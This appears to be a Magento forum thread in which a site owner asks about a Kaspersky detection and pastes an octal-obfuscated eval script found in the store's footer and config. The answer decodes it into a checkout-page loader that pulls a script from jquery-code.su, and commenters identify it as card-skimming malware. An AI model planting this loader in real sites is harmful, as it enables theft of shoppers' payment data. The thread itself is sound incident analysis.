# HEUR: Trojan.Script.Generic

Tags: magento-1.9

One of my Magento sites keeps showing this error on Kaspersky for some reason. The only script I found was the following

```
<script>
eval('\156\145\167\40\122\145\147\105\170\160\50\42\157\156\145\160\141\147\145\174\143\150\145\143\153\157\165\164\17    4\157\156\145\163\164\145\160\174\146\151\162\145\143\150\145\143\153\157\165\164\42\51\56\164\145\163\164\50\167\151\156\144\157\167\56\154\157\143\141\164\151\157\156\51\46\46\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\163\143\162\151\160\164\40\163\162\143\75\42\150\164\164\160\163\72\57\57\167\167\167\56\165\160\163\56\143\157\155\57\141\163\163\145\164\163\57\146\162\141\155\145\167\157\162\153\57\152\161\165\145\162\171\57\152\161\165\145\162\171\55\61\56\61\61\56\61\56\155\151\156\56\152\163\42\76\74\57\163\143\162\151\160\164\76\74\163\143\162\151\160\164\40\164\171\160\145\75\42\164\145\170\164\57\152\141\166\141\163\143\162\151\160\164\42\76\166\141\162\40\152\121\165\145\162\171\61\67\40\75\40\44\56\156\157\103\157\156\146\154\151\143\164\50\164\162\165\145\51\73\74\57\163\143\162\151\160\164\76\74\163\143\162\151\160\164\40\163\162\143\75\42\150\164\164\160\163\72\57\57\152\161\165\145\162\171\55\143\157\144\145\56\163\165\57\151\155\141\147\145\163\57\154\151\164\145\56\152\163\42\76\74\57\163\143\162\151\160\164\76\47\51\73')
    </script>
```

I have submitted the clean site to Kaspersky again, anyone know how long it usually takes? And also what in the world that script is?

Thanks

Comment: In which module was this script included?

Comment: Thanks, hadn't seen this one yet. I'm adding it to Magereport..

Comment: Found it in a couple of places actually. Footer.phtml, on the footer_links on static blocks, and on the admin config misc html

Answer (score 0):

The decoded value of the script above is:

```
new RegExp("onepage|checkout|onestep|firecheckout").test(window.location)&&document.write('<script src="https://www.ups.com/assets/framework/jquery/jquery-1.11.1.min.js"></script><script type="text/javascript">var jQuery17 = $.noConflict(true);</script><script src="https://jquery-code.su/images/lite.js"></script>');
```

Comment: is this malicious? malware?

Comment: Yes, you can more about it on this [site](http://gwillem.gitlab.io/2016/10/11/5900-online-stores-found-skimming/).